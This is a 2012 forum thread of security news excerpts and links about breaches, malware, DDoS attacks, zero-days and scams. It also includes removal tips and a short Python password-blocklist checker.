http://cnnpressroom.blogs.cnn.com/2012/10/18/ac360-video-preview-exclusive-invu-w-reddit-jailbait-moderator-michael-brutsch-tonight/
-
How to fail at nuclear espionage
http://blogs.norman.com/2012/security-research/how-to-fail-at-nuclear-espionage
-
HP asks researcher not to publish security vulnerabilities
http://www.h-online.com/security/news/item/HP-asks-researcher-not-to-publish-security-vulnerabilities-1733216.html
-
***
HSBC confirms cyber attack
A cyber attack targeted HSBC websites this week, preventing customers from using HSBC online services, including internet banking.
A day after the Oct. 18 attack, the global financial firm released a statement saying that “some sites” are operating again. The denial of service attack did not affect customer data, the bank said.
A spokesperson could not say whether HSBC commercial banking customers in Western New York were impacted.
Several banks around the country have encountered cyber attacks in recent weeks. Capital One Financial Corp. and BB&T Corp. were also targeted this week.
Read more at :
http://www.bizjournals.com/buffalo/news/2012/10/19/hsbc-confirms-cyber-attack.html
***
-
***
Social engineering is a growing threat to computer security
Some companies protect their computer systems with expensive technology, but they often overlook the employee who may be conned into unlocking private information and giving it away to anyone who asks for it.
Technology security experts like Nathan LaFollette are hired to test computer systems for vulnerabilities -- both inside and outside the building. He said the human element is often the weakest link and can be exploited by social engineering. He says hackers sometimes find it easier to trick an employee to reveal passwords than finding their own way through computer firewalls.
Experts at technology firms like Cisco report that hackers are constantly using social engineering techniques that take advantage of real employee names, partial passwords or use schemes to convince employees they're involved in legitimate transactions.
"Social engineering is a huge threat for corporations, but they don't spend a lot of money or training on it," said LaFollette, founder and chief executive officer of Inet\Detect in Brunswick. "It's a major problem that will continue to grow and it's not something that you can just throw products at to remediate."
See & read more at :
http://www.cleveland.com/business/index.ssf/2012/10/social_engineering_is_a_growin.html
***
-
***
Real-Time Cyber-Attack Map
"In October, two German computer security researchers created a map that allows you to see a picture of online cyber-attacks as they happen. The map isn't out of a techno-thriller, tracking the location of some hacker in a basement trying to steal government secrets. Instead, it's built around a worldwide project designed to study online intruders. The data comes from honeypots. When the bots go after a honeypot, however, they're really hacking into a virtual machine inside a secure computer. The attack is broadcast on the map—and the researchers behind the project have a picture of how a virus works that they can use to prevent similar attacks or prepare new defenses."
Read at :
http://it.slashdot.org/story/12/10/19/2344253/real-time-cyber-attack-map?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot+%28Slashdot%29
See active map at :
http://map.honeynet.org/
-
Spammers spoof shortened links ending in .gov: http://www.symantec.com/connect/blogs/spam-gov-urls (link author: Eric Park on Symantec Community: Connect)
For example, 15% of all clicks on 1 dot usa dot gov go to spam...
polonus
-
It is a shame that this technology is insecure and leaks information to potential burglars that residents are not at home.
Read this article on the insecurity of smart meter read-outs: http://www.winlab.rutgers.edu/~gruteser/papers/fp023-roufPS.pdf
Article authors are Ishtiaq Rouf, Hossen Mustafa, Miao Xu and Wenyuan Xu (University of South Carolina), Rob Miller (Applied Communication Sciences) and Marco Gruteser (Rutgers University).
polonus
-
***
White House Denies Networking Firm Huawei Cleared of Spying for China
No review has cleared Huawei or any other vendor supplying telecommunications equipment to U.S. firms of spying allegations, a White House official said.
The White House is denying a media report that an investigation into corporations supplying U.S. telecommunications companies with equipment found no proof Huawei Technologies was involved in espionage on behalf of China.
Citing anonymous sources, Reuters reported that an 18-month examination of Huawei's communications equipment revealed the products contained security vulnerabilities that could be exploited by hackers, but not evidence the company had spied on the United States.
Read more at :
http://www.eweek.com/networking/white-house-denies-networking-firm-huawei-cleared-of-spying-for-china/?kc=EWKNLEDP10222012E
***
-
***
Android Malware Takes off, Mostly Outside the U.S.
A very compelling reason to be using Avast Mobile Security on Android devices
Attackers are continuing to focus more heavily on mobile devices, and in particular those running Google’s Android operating system, posting 175,000 malicious or suspicious programs to app stores.
The activity in the third quarter is a steep increase from the previous quarter when the firm only found 30,000 apps that appeared to take malicious actions or aggressively gather information on a user.
Read more at :
http://www.eweek.com/security/android-malware-takes-off-mostly-outside-the-u.s./?kc=EWKNLEDP10232012E
***
-
Google Drive opens backdoor to Google accounts
http://www.h-online.com/security/news/item/Google-Drive-opens-backdoor-to-Google-accounts-1735069.html
-
Yahoo Messenger Malvertising Hijacks Your Browser Start Page to Vietnamese Portal (http://www.hotforsecurity.com/blog/yahoo-messenger-malvertising-hijacks-your-browser-start-page-to-vietnamese-portal-4021.html?goback=%2Egde_1003727_member_178260803)
"Until the removal tool is ready, go to http://technet.microsoft.com/en-us/sysinternals/bb545027
download & execute: autoruns
look for "Laban.vn" and disable it
additionally you can add this line in hosts file
127.0.0.1 laban.vn"
-
***
'Password' is still the worst password, but watch out for 'ninja'
Although the tech world is always changing, one thing remains the same: A lot of people use terrible passwords.
Splashdata, a security software developer, released its annual list of the most common passwords on the Internet. Once again, “password,” “123456,” and “12345678” are the three most popular, in that order.
The list of most common passwords is based on file dumps from online hackers. Splashdata notes that 2012 saw several high-profile security breaches, including Yahoo, LinkedIn, eHarmony, and Last.fm. The company says it releases its annual list to raise awareness of bad passwords ......
See the list & read more at :
http://www.pcworld.com/article/2013012/password-is-still-the-worst-password-but-watch-out-for-ninja.html
***
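The list in the article only bites if a login system actually refuses the entries on it, including the dressed-up variants people think are clever. The check below is an added example for this thread (not code from Splashdata or the article) that compares a candidate against a blocklist after undoing the usual disguises: case, trailing digits and symbols, and the common letter-for-symbol substitutions, so that "P@ssw0rd1!" is still caught as "password". The blocklist is constructed from the entries the post names plus a few staples, and the 12-character minimum is an assumed local policy.

```python
import re

# Constructed blocklist seeded with the entries the post names plus a few
# staples; a real deployment loads a breach-derived list of many thousands
# (assumption for this example).
COMMON_PASSWORDS = {"password", "123456", "12345678", "ninja",
                    "qwerty", "abc123", "letmein"}

MIN_LENGTH = 12   # assumed local policy

# Common substitutions people apply to dress up a dictionary word.
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})

# Trailing digits/symbols tacked on to satisfy "must contain a number".
TRAILING_JUNK = re.compile(r"[0-9!@#$%^&*._-]+$")


def candidates(password):
    """Forms under which a disguised common password is compared to the list."""
    lowered = password.lower()
    stripped = TRAILING_JUNK.sub("", lowered)      # "password2012!" -> "password"
    forms = {lowered, lowered.translate(LEET),
             stripped, stripped.translate(LEET)}   # "p@ssw0rd1" -> "password"
    forms.discard("")                               # all-digit inputs strip to nothing
    return forms


def weaknesses(password, blocklist=COMMON_PASSWORDS, min_length=MIN_LENGTH):
    """Return the reasons a password is rejected; an empty list means it passes."""
    reasons = []
    if len(password) < min_length:
        reasons.append(f"too short: {len(password)} < {min_length}")
    lowered = password.lower()
    if lowered in blocklist:
        reasons.append("on the common-password list")
    else:
        hit = next((c for c in sorted(candidates(password)) if c in blocklist), None)
        if hit is not None:
            reasons.append(f"trivial variant of common password {hit!r}")
    return reasons


if __name__ == "__main__":
    for sample in ("password", "P@ssw0rd1!", "N1nj4", "correct horse battery staple"):
        verdict = weaknesses(sample) or ["ok"]
        print(f"{sample!r}: {'; '.join(verdict)}")
```

Returning the reasons rather than a bare yes/no lets the sign-up form tell the user what to change; the comparison is done on the server against the stored list, never by shipping the list to the browser.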
-
***
Barnes & Noble says pin pads in 63 stores hacked
Barnes & Noble Inc. said Tuesday that devices used by customers to swipe credit and debit cards have been tampered with in 63 of its stores in nine states.
The New York-based bookseller said in a statement Tuesday only one of the devices, known as PIN pads, was tampered with in each of the 63 stores. The stores are in California, Connecticut, Florida, Illinois, Massachusetts, New Jersey, New York, Pennsylvania and Rhode Island.
Read more at :
http://blog.al.com/wire/2012/10/barnes_noble_says_pin_pads_in.html
***
-
***
Campbell River RCMP issues computer virus alert for 'sophisticated screen' that takes over monitor
Campbell River RCMP has issued a warning about a new computer virus affecting local computers.
The virus locks your computer and displays a sophisticated screen with the message: "Police Cybercrime Investigation Department. Your computer has been locked!" Beside the title is a coat of arms similar to the RCMP's, labelled "Canadian Pacific Police Service."
This is not an existing police agency, the RCMP says. The virus takes over your webcam and displays a live-streaming video of yourself on the screen along with other messages and instructions.
See & read more at :
http://www.timescolonist.com/news/Campbell+River+RCMP+issues+computer+virus+alert+sophisticated/7432776/story.html
-
***
Spying Eyes Are Watching You
Now that the Cold War is a distant memory and James Bond movies just ain’t what they used to be, you may think that the spy game is dead. Well, think again. A new report from the Office of the National Counterintelligence Executive, charmingly called ONCIX, tells quite a different story.
Espionage against the United States is a “significant and growing threat to the nation’s prosperity.” Spying is, in fact, even worse than it was in the salad days of Smiley’s people because of the advent of ... you guessed it: the Internet. Says ONCIX: “Cyberspace—where most business activity and development of new ideas now takes place—amplifies ... threats by making it possible for malicious actors ... to quickly steal and transfer massive quantities of data while remaining anonymous and hard to detect.”
Read more at :
http://www.baselinemag.com/c/a/Intelligence/James-Bond-Lives-746971/
***
-
***
DoS/DDoS Attacks Grow in Complexity
As GoDaddy and Bank of America recently discovered, denial of service (DoS) attacks and distributed denial of service (DDoS) attacks are commonplace and increasingly sophisticated
Denial of service (DoS) attacks and distributed denial of service (DDoS) attacks are a vexing problem for organizations. What's more, as GoDaddy and Bank of America recently discovered, they're commonplace and increasingly sophisticated. Hackers use these techniques to take down sites and damage a company's reputation or bottom line. Unfortunately, "Every site is a potential target," observes Tal Beery, security researcher for Imperva.
Imperva's September Hacker Intelligence report, “Denial of Service,” provides some insight into the current state of DoS and DDoS, which are increasingly used by groups such as Anonymous and LulzSec to support their goals and promote their messages. A growing problem, the report notes, involves hackers executing DDoS attacks by analyzing the technical tools and trends deployed during several recent hacking operations.
Read more at :
http://www.baselinemag.com/security/dosddos-attacks-grow-in-complexity/
***
-
***
Public Privacy and the Glass House
We must live with the fact that we cannot protect the Internet environment when we live in a glass house—a characterization of how insecurity pervades our world.
There always has been tension between functionality and security, and likely always will be. Functionality usually wins out because we can calculate the ROI value for functionality, but calculating ROI for security is problematic.
Efforts to forecast the consequences of a future breach, leak or insider theft rapidly break down. They sound like hollow warnings by Henny Penny that the sky is falling. It's uncomfortable—and often professionally suicidal—to make projections for costs and likely consequences for cyber-threats.
Read much more at :
http://www.baselinemag.com/security/public-privacy-and-the-glass-house/
***
-
***
Israel Police disconnect from Internet, fearing cyber war
Officers ordered to be extra careful with computers following fears of an attack; unclear if breach was wide-scale attack or virus.
Investigators from the Israel Police information security branch are on the trail of a viral break-in of the national police computer system, which forced the police to take their operations off-line on Wednesday, and issue strict computer security guidelines to officers.
On Thursday, police announced that they had ordered all officers to no longer use the Internet on police computers and avoid using thumb drives or CDs, or any other passing of data and programs between police computers. They said the decision was made after an infiltration of some sort in the police computer system raised flags in the computer security department of the police.
Read more at :
http://www.jpost.com/NationalNews/Article.aspx?id=289260&R=R2
***
-
***
Massive Data Breach Hits South Carolina State Tax System
The latest breach shows that state and local governments as well as private corporations need to better lock down their data and perform regular security assessments, security experts say.
The theft of approximately 3.6 million Social Security numbers and information on 387,000 credit and debit card accounts is yet another reminder that all IT operations should lock down their sensitive data by segmenting their networks, using better access controls, and regularly performing vulnerability assessments, security experts said.
On Oct. 26, the South Carolina Department of Revenue announced that attackers had breached its systems in September, following two previous attacks in August. The attacks exploited an unspecified vulnerability in the system, which the state agency closed on Oct. 20. The online thieves who breached its network took a large amount of sensitive information on any taxpayers that had filed tax returns since 1998.
Read more at :
http://www.eweek.com/security/massive-data-breach-hits-south-carolina-state-tax-system/
***
-
Phishing attack promises a free version of Windows 8 (http://nakedsecurity.sophos.com/2012/10/29/phishing-attack-windows-8/)
(http://sophosnews.files.wordpress.com/2012/10/windows8-phish-email.jpg?w=640)
Don't be fooled. If you want Windows 8, buy it. You can't get it for free!
-
Telefónica wants to turn customer data into cash
http://www.h-online.com/security/news/item/Telefonica-wants-to-turn-customer-data-into-cash-1739251.html
-
Free e-books could infest thousands of tablets through malicious javascript: ePub 3 standard leaves room for interactive elements using javascript, opening the door to malicious hacker exploits: http://www.eburon.nl/301012_gratis_ebook_infecteert_tienduizenden_tablets_met_trojan -> article author Wiebe de Jager
( 30-10-12 15:13 ) This could mean a serious threat in the foreseeable future.
polonus
-
Thousands and thousands of firms can be easily hacked through SNMP through bad configuration of routers and ADSL modems:
http://www.securitypronews.com/securitypronews-24-20030909SNMPEnumerationandHacking.html
Link article by Mati Aharoni
First it was thought it was only a printer related problem, but the situation is far worse than initially assumed.
And as we read from the link the threat already existed in 2005.
See this Dutch newspaper article
http://www.telegraaf.nl/digitaal/13140020/__13.656_bedrijven_zo_te_hacken__.html
polonus
-
New vicious UEFI bootkit vuln found for Windows 8 (http://www.theregister.co.uk/2012/09/19/win8_rootkit/?goback=%2Egde_1003727_member_181335821)
Certainly not good news.
-
Don't social network on you and yours being away for a social gathering nearby. Burglars may read your messages and pay a visit to the premises.
Keep your private affairs private.
polonus
-
***
Malware Infects About 13 Percent of Home Networks: Kindsight Report
A network security provider finds that 13 percent of home networks in North America are infected with malware, including 2.2 million systems infected with the botnet using compromised systems for click fraud.
Malware continues to plague home users, with about 13 percent, or nearly one-in-seven home networks showing signs of at least one compromised system, network security firm Kindsight stated in a report published on Oct. 30.
The firm, which provides security services to major Internet service providers, can detect when computers are trying to communicate with a malicious domain or server. In the third quarter of 2012, some 6.5 percent of home networks showed signs of hosting highly dangerous malware, such as a banking trojan or bot software, while 8.1 percent showed signs of more moderate infections, such as adware or spyware. Some networks had both types of infections.
Read more at :
http://www.eweek.com/security/malware-infects-about-13-percent-of-home-networks-kindsight-report/
***
-
Vupen brags about Windows 8 hack
http://www.h-online.com/security/news/item/Vupen-brags-about-Windows-8-hack-1742332.html
-
Trojan bargain with Windows 8 support
http://www.h-online.com/security/news/item/Trojan-bargain-with-Windows-8-support-1740800.html
-
Speculation over Facebook access via Google index
http://www.h-online.com/security/news/item/Speculation-over-Facebook-access-via-Google-index-1742538.html
-
New zero-day in Adobe-X exploited in blackhole kit malware: http://www.group-ib.com/index.php/7-novosti/672-group-ib-us-zero-day-vulnerability-found-in-adobe-x%22
polonus
-
***
Security Researcher Finds Critical Flaws in Sophos Anti-Virus Engine
Multiple vulnerabilities uncovered by security researcher Tavis Ormandy could have permitted attackers to remotely execute code or cause other problems for Sophos Anti-Virus.
Security vendor Sophos has plugged a series of security holes in its antivirus product that were uncovered by a security researcher. In some cases, these security holes could have been exploited to cause crashes or to remotely execute code, according to the researcher.
Sophos says it has already patched most of the flaws discovered by Ormandy and will release patches for additional issues Nov. 28.
"The paper includes a working pre-authentication remote root exploit that requires zero-iteration, and could be wormed within the next few days," he explained. "I would suggest administrators deploying Sophos products study my results urgently, and implement the recommendations."
"A working exploit for Sophos 8.0.6 on Mac is available; however, the techniques used in the exploit easily transfer to Windows and Linux, due to multiple critical implementation flaws described in the paper," he added.
Read more at :
http://www.eweek.com/security/security-researcher-finds-critical-flaws-in-sophos-anti-virus-engine/
***
-
***
Anonymous Hackers Claim Protest Attacks Hit Zynga, Facebook, Others
Hackers with the group Anonymous have apparently chosen computer gaming vendor Zynga and social networking powerhouse Facebook as the latest targets of a campaign that aims to reel in the power and wealth of the companies.
In a Nov. 5 post on the AnonNews Website, the group says it is taking the actions because of recent developments at Zynga, including the reported layoffs of some workers.
Read more at :
http://www.eweek.com/security/anonymous-hackers-claim-protest-attacks-hit-zynga-facebook-others.html
***
-
***
100K Google Android Apps Pose Potential Security Risk: Bit9 Report
A mobile security report from security vendor Bit9 said that 100,000 applications it examined on Google Play were questionable or suspicious due to the types of permissions they requested, the reputation of the application's publisher and other factors.
Bit9's criteria for defining an application as "questionable" or "suspicious" included permissions requested by the application, categorization of the application, user rating, number of downloads and the reputation of the application's publisher.
In its examination of more than 400,000 Android apps, Bit9 found 72 percent use at least one high-risk permission. In addition, 42 percent of the apps access GPS location data, including wallpapers, games and utilities; 31 percent access phone calls or phone numbers; 26 percent access personal data, such as contacts and email; and 9 percent use permissions that can cost the user money.
"Most consumers are willing to click “allow” for mobile apps in situations they probably would never have allowed on a Windows computer," he said. "This is because people do not yet consider their smartphones as vulnerable or as sensitive as they do their desktops and laptops; even though those smartphones are essentially just smaller computers, and debatably store even more personal information than the average laptop."
"Another problem is that there are dozens of different permissions on an Android device," he added. "The disclosure dialog box cannot list or properly explain them all. Even if it could, some are simply too esoteric or technical for an ordinary consumer to understand. If the warning described the possible risks, not just the permission requested, that might help, but then you would be talking about a dialog box as large as a license agreement—how many people actually read license agreements in full?"
Read more at :
http://www.eweek.com/security/100k-google-android-apps-pose-potential-security-risk-bit9-report/
***
-
***
Hackers claim attacks against ImageShack, Symantec, other websites
Different hacker groups claim to have breached servers belonging to ImageShack, Symantec, and other organizations.
Update, November 7: This story initially reported that HTP had targeted Paypal. Paypal has since issued a statement that it has not suffered a security breach and the Cyberwarnews.info story that reported the payment processing company had been the victim of an 0 day exploit has been updated to state that ZPanel had been targeted by hackers, not Paypal.
On Sunday, a hacker group called HTP claimed to have compromised Web servers, MySQL databases, routers and management servers used by the ImageShack and yfrog image hosting services.
ImageShack did not immediately return a request for comment.
In the same post, HTP claims to have hacked servers belonging to Symantec. The leaked data includes information the hackers claim to have copied from a Symantec database, including the names, email addresses and hashed passwords of hundreds of users. Many of the email addresses are on the @symantec.com domain.
Read more at :
http://www.computerworld.com.au/article/441022/hackers_claim_attacks_against_imageshack_symantec_other_websites/
***
-
***
Hackers Love Android Gingerbread
Running outdated software on your smartphone can make you an easy target for malware and viruses. The latest report by Russian security firm Kaspersky Lab reveals that 28% of all Android phones infected by malware are running Gingerbread, the operating system’s 2.3.6 version, released in September 2011.
That high number has something to do with the fact that more than half of Android devices in the market run that version of the software. Ice Cream Sandwich ranked second, with 23% of the attacks, despite having a market share considerably lower than Gingerbread — only one in four Android phones is running this version.
Read more at :
http://mashable.com/2012/11/08/hackers-love-android-gingerbread/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Mashable+%28Mashable%29
***
-
***
Zero-day PDF exploit reportedly defeats Adobe Reader sandbox protection
Cyber criminals are using a new PDF exploit that bypasses the sandbox security features in Adobe Reader X and XI, in order to install banking malware on computers, according to researchers from Russian security firm Group-IB.
The zero-day exploit -- an exploit for a previously unknown and unpatched vulnerability -- has been integrated into a privately modified version of Blackhole, a commercial Web-based attack toolkit, the Group-IB researchers announced Wednesday.
Read more at :
http://www.infoworld.com/d/security/zero-day-pdf-exploit-reportedly-defeats-adobe-reader-sandbox-protection-206657?source=rss_
***
-
Hi CharleyO,
Did you see this? Re: http://forum.avast.com/index.php?topic=52252.msg860586#msg860586
Well one should always be warned twice in the case of a zero day, I think, ;D
polonus
-
***
Sorry about that, Polonus, as I should have read farther back. But, as you said, being warned twice is not too many times in this case. ;)
***
Future Flash security updates will be synchronized with Microsoft's monthly patch schedule
Adobe on Tuesday announced it will pair future security updates for its popular Flash Player with Microsoft's Patch Tuesday schedule.
At the same time, Adobe issued an update that patched seven critical Flash vulnerabilities, and Microsoft shipped fixes for Internet Explorer 10 (IE10), which includes an embedded copy of Flash.
Even though the Flash updates will add more Patch Tuesday work for users, security professionals praised Adobe's change. "Concentrating updates on a single day is a benefit for any organization that manages patch roll-outs," said Wolfgang Kandek, CTO of Qualys, in an email. "That way the update can be handled by the same decision process, which should streamline roll-outs and get Flash updates [installed] more widely."
Read more at :
https://www.infoworld.com/d/security/adobe-now-married-microsoft-moves-flash-updates-patch-tuesday-206571?source=rss_
***
-
***
In this thread, what is usually posted is closer to "doom & gloom" than anything else. But, below is a little ray of sunshine.
New online game trains kids against cyber attacks
The National Science Center, or NSC, is now training kids to stay safe from cyber attack malware when they’re surfing the web or using email and cell phones. A new online game called Cyber Swarm Defenders is targeted to 6th-8th grade students and is also appropriate for younger students.
The game is part of the NSC’s newest Cyber Ops education outreach program. The NSC is a public-private partnership between the U.S. Army and NSC, Inc., that uses its resources to stimulate and increase science, technology, engineering, and mathematics, known as STEM, proficiency in U.S. students, especially those in grades 4-9.
“Anything we can do to make the young students of our country understand the cyber threat and get them excited about STEM technologies has a big payoff,” said Ron Ross, chairman of the NSC.
Read more at :
http://www.defencetalk.com/new-online-game-trains-kids-against-cyber-attacks-45388/
***
-
Security issue discovered in TOR client
http://www.h-online.com/security/news/item/Security-issue-discovered-in-TOR-client-1746884.html
-
Microsoft Security Bulletin Advance Notification for November 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-nov
-
Exclusive: John McAfee Wanted for Murder (Updated)
http://gizmodo.com/5959812/john-mcafee-wanted-for-murder
http://www.dailymail.co.uk/news/article-2149904/John-McAfee-arrested-Belize-police-claim-running-meth-lab.html
-
update on the above...
3 detained in killing of Internet pioneer's neighbor in Belize
http://edition.cnn.com/2012/11/13/world/americas/belize-mcafee-killing/index.html?iref=allsearch
-
Adobe confirms customer data breach
http://www.h-online.com/security/news/item/Adobe-confirms-customer-data-breach-1750344.html
-
XSS hole on ebay dot com still open: http://blog.aegislab.com/index.php?op=ViewArticle&articleId=228&blogId=1
polonus
-
Malware Targeting Windows 8 Uses Google Docs
http://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs
-
***
Judge approves FTC's $22.5M fine of Google
A federal judge has approved a $22.5 million fine to penalize Google for an alleged privacy breach, rejecting a consumer-rights group's plea for tougher punishment.
The blessing from U.S. District Judge Susan Illston came late Friday. She made her ruling a few hours after a hearing in San Francisco for final arguments about a fine that's the cornerstone of a settlement reached three months ago between the Federal Trade Commission and Google Inc.
The rebuke revolves around allegations that Google duped millions of Web surfers using the Safari browser into believing their online activities couldn't be tracked by the company as long as they didn't change the browser's privacy settings. That assurance was posted on Google's website earlier this year, even as the Internet search leader was inserting computer coding that bypassed Safari's automatic settings and enabled the company to peer into the online lives of the browser's users.
The FTC concluded that the contradiction between Google's stealth tracking and its privacy assurances to Safari users violated a vow the company made in another settlement with the agency last year. Google had promised not to mislead people about its privacy practices.
Read more at :
http://my.earthlink.net/article/tec?guid=20121116/490a38cf-45a5-426e-ab6f-62aca8797276
***
-
***
Anonymous hack hundreds of Israeli websites, delete Foreign Ministry database in support of Gaza
Hacker group Anonymous has launched a massive attack named #OpIsrael on almost 700 Israeli websites, protesting against Operation Pillar of Defense in Gaza. Israeli media confirmed the group’s move.
The hackers reportedly took down websites ranging from high-profile governmental structures such as the Foreign Ministry to local tourism companies’ pages.
The biggest attack as of now has been the Israeli Foreign Ministry’s international development program, titled Mashav. Anonymous announced on Twitter they’ve hacked into the program’s database, with the website remaining inaccessible at the moment.
Read more at :
http://rt.com/news/anonymous-gaza-israel-website-938/
***
-
PASSTEAL Sneaks into Users Systems via File Sharing Sites
http://blog.trendmicro.com/trendlabs-security-intelligence/passteal-sneaks-into-users-systems-via-file-sharing-sites/
-
Securebrowserupdate is malvertising fraudulent malcode: http://stopmalvertising.com/malvertisements/securebrowserupdate.com-wants-to-update-your-browser-with-malware.html
polonus
-
Professional trojan targets SEPA transactions
http://www.h-online.com/security/news/item/Professional-trojan-targets-SEPA-transactions-1754446.html
-
Exploit toolkit incorporates new Flash exploit: http://eromang.zataz.com/2012/11/24/gong-da-gondad-exploit-pack-add-adobe-flash-cve-2012-1535-support/
link author = Eric Romang
polonus
-
***
Dutch gov't: suspects must decrypt computers
The Dutch government says it is planning to make it a crime for a suspect in a child sex abuse or terrorism case to refuse to help decrypt a computer when ordered to do so by prosecutors.
The legislation was prompted by a case in Amsterdam last year, in which a pedophile who abused more than 80 children and infants used sophisticated computer encryption software that slowed his investigation. Members of his network are still being caught.
Read more at :
http://my.earthlink.net/article/tec?guid=20121128/7ac907f3-bf73-4121-a338-e89809405f32
***
-
***
UN nuclear agency reports being hacked
The International Atomic Energy Agency acknowledged Tuesday that one of its servers had been hacked after a previously unknown group critical of Israel's undeclared nuclear weapons program posted contact details for more than 100 experts working for the U.N. nuclear watchdog.
A group called "Parastoo" — Farsi for the swallow bird and a common Iranian girl's name — claimed responsibility for posting the names on its website two days ago.
Read more at :
http://my.earthlink.net/article/tec?guid=20121127/c30814f7-bb01-458d-9f57-c092f96a0f77
***
-
Firms to meet more "salami" attacks for 2013: http://www.varonis.com/news-events/press-releases/2012/2013-predictions.html
link article author = Yaki Faitelson
polonus
-
***
Algerian hacker hijacks the Romanian domains of Google and Yahoo
The Romanian domains of Google and Yahoo encountered a hiccup earlier this morning, when an alleged Algerian hacker re-directed Google.ro and Yahoo.ro users to a page where the hacker who uses the moniker MCA-CRB wrote the message 'to be continued'.
Read more at :
http://www.topix.com/tech/computer-security/2012/11/algerian-hacker-hijacks-the-romanian-domains-of-google-and-yahoo
-
***
Cyber attack reporting will boost defence capability, says Neelie Kroes
The European Commission (EC) is considering making it mandatory for companies to report cyber attacks to harness the benefits of open dialogue, says vice-president Neelie Kroes.
Despite industry opposition, open discussion about cyber threats is vital to enable organisations to learn and improve understanding of the issue, she told the German publication Süddeutsche Zeitung.
Read more at :
http://www.computerweekly.com/news/2240172870/Cyber-attack-reporting-will-boost-defence-capability-says-Neelie-Kroes
***
-
Samsung network printer vulnerability discovered
http://www.h-online.com/security/news/item/Samsung-network-printer-vulnerability-discovered-1757967.html
http://www.kb.cert.org/vuls/id/281284
-
just noticed....VirusTotal have some new scanners, like.....Malwarebytes ;)
https://www.virustotal.com/file/ca9722329a3c57be5a9e15fa58252377604a4d73dc1c3400aaa62c193f808ac9/analysis/
http://blog.virustotal.com/2012/11/virustotal-malwarebytes.html
-
Thanks for the general heads-up on this. Already was aware of this positive addition to VT...
polonus
-
just noticed....VirusTotal have some new scanners, like.....Malwarebytes ;)
Great, it was about time. :)
-
just noticed....VirusTotal have some new scanners, like.....Malwarebytes ;)
Great, it was about time. :)
I'm sure there used to be one there for a period of time but it came off for some reason or other.
-
Scammers Target Chrome Users With Fake Update Page
Scammers are an innovative bunch, and security researchers have uncovered a method they are using to get around the security features built into the Google Chrome Web browser.
http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page (http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page)
-
Account theft still possible with latest WhatsApp
http://www.h-online.com/security/news/item/Account-theft-still-possible-with-latest-WhatsApp-1760639.html
-
Scammers Target Chrome Users With Fake Update Page
Scammers are an innovative bunch, and security researchers have uncovered a method they are using to get around the security features built into the Google Chrome Web browser.
http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page (http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page)
This is very easily avoided by using the built-in update function in Chrome.
Never use an outside link for a built-in function and avoid these kinds of scams.
(http://www.jetScreenshot.com/demo/20121202-86g-26kb.jpg)
-
Worm Tries AutoRun, Then Social Engineering to Infect.
http://www.majorgeeks.com/story.php?id=36748
-
Season's gr3371ng5 - hacker releases exploits for MySQL and SSH
http://www.h-online.com/open/news/item/Season-s-gr3371ng5-hacker-releases-exploits-for-MySQL-and-SSH-1761125.html
-
Tumblr troubled by trojan text
http://www.h-online.com/security/news/item/Tumblr-troubled-by-trojan-text-1761800.html
-
Beware… The 12 Christmas Online Scams
http://lavasoft.com/mylavasoft/company/blog/beware%E2%80%A6-the-12-christmas-online-scams
-
Microsoft Security Bulletin Advance Notification for December 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-dec
-
Necurs malware threatens and disables av scanners: http://blogs.technet.com/b/mmpc/archive/2012/12/06/unexpected-reboot-necurs.aspx (article link author = Microsoft Malware Protection Center's Tim Liu)
polonus
-
Malicious QR barcode stickers found http://www.theregister.co.uk/2012/12/10/qr_code_sticker_scam/ (article author = John Leyden)
polonus
-
This issue with the potential for malicious QR codes has been known about for some considerable time now (certainly for me) as like the short URLs there are limited ways to confirm what the end URL is without actually clicking on the link or scanning the QR code.
-
Hi DavidR,
Yes and you will see these scan codes more and more. On local busses, in newspaper ads, etc.
polonus
-
Millions stolen with mTAN fraud
http://www.h-online.com/security/news/item/Millions-stolen-with-mTAN-fraud-1763923.html
https://www.checkpoint.com/products/downloads/whitepapers/Eurograbber_White_Paper.pdf
-
Hi DavidR,
Yes and you will see these scan codes more and more. On local busses, in newspaper ads, etc.
polonus
Millions stolen with mTAN fraud
http://www.h-online.com/security/news/item/Millions-stolen-with-mTAN-fraud-1763923.html
https://www.checkpoint.com/products/downloads/whitepapers/Eurograbber_White_Paper.pdf
I recall a time when a phone was just simply a phone. I choose to have a service that costs only $40.00 a month, and it certainly does not support a smartphone, and does what I need to have it do. Internet surfing is useless on this device, but it is there. Think risk factor is much less with such a device, IMO.
-
Joomla sites misused to deploy malware
http://www.h-online.com/open/news/item/Joomla-sites-misused-to-deploy-malware-1766841.html
https://isc.sans.edu/diary/Joomla+and+WordPress+Bulk+Exploit+Going+on/14677
-
Apps for Windows 8 easily hacked
http://www.h-online.com/security/news/item/Apps-for-Windows-8-easily-hacked-1767839.html
-
Users of IE spied upon through unpatched mouse-cursor vulnerability (virtual keyboard users at risk): http://spider.io/blog/2012/12/internet-explorer-data-leakage/
polonus
-
More Google Chrome specific malware expected in 2013. For instance malcreants like to adopt the Carberp digital bankrobber to function in the Google Chrome browser: http://malware.dontneedcoffee.com/2012/12/carberprenaissance.html#!/2012/12/carberprenaissance.html (link author = Kafeine)
polonus
-
Carberp started to infect through malicious QR: http://www.securelist.com/en/blog/208194045/Carberp_in_the_Mobile (link article author = Denis, Kaspersky Lab Expert on a series of articles on Man in the Mobile Attacks)
polonus
-
Internet Explorer Bug Tracks Every Mouse Move, Even Outside the Browser
http://www.bitdefender.com/security/internet-explorer-bug-tracks-every-mouse-move-even-outside-the-browser.html
-
Trojan.Batchwiper
http://www.symantec.com/connect/blogs/trojanbatchwiper-reported-iran (http://www.symantec.com/connect/blogs/trojanbatchwiper-reported-iran)
-
Exynos 4 critical security hole affects many Galaxy devices
http://www.h-online.com/open/news/item/Exynos-4-critical-security-hole-affects-many-Galaxy-devices-1770075.html
-
Massive iframe injection alert: http://stopmalvertising.com/malware-reports/massive-iframe-injection-hits-several-cms.html
(article author Kimberly)
polonus
-
